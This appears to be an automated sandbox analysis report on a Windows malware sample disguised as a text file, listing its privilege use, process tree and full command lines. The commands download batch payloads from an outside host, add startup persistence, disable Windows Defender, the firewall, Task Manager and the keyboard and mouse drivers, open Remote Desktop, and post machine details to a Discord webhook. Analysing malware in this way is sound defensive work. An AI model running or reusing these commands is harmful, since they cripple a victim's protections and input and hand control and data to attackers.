N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4984 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 4984 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 4984 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 4984 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 4984 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Windows\system32\cmd.exe
PID 560 wrote to memory of 4488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 560 wrote to memory of 4488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 560 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 560 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 560 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 560 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 560 wrote to memory of 3420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 560 wrote to memory of 3420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3420 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 3420 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 1136 wrote to memory of 3864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 1136 wrote to memory of 3864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 1136 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1136 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3420 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3420 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3420 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 2304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 2304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 4136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1136 wrote to memory of 4136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3420 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3420 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1136 wrote to memory of 2484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 2484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 3308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net1.exe
PID 3420 wrote to memory of 3308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net1.exe
PID 1136 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1136 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3420 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1136 wrote to memory of 1204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3420 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3420 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3420 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1136 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1136 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe

"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "

C:\Windows\system32\curl.exe

curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat

C:\Windows\system32\curl.exe

curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"

C:\Windows\system32\openfiles.exe

openfiles

C:\Windows\system32\openfiles.exe

openfiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "(new-object -com shell.application).minimizeall()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "(new-object -com shell.application).minimizeall()"

C:\Windows\system32\curl.exe

curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png

C:\Windows\system32\curl.exe

curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start=disabled

C:\Windows\system32\sc.exe

sc config WinDefend start=disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\netsh.exe

netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

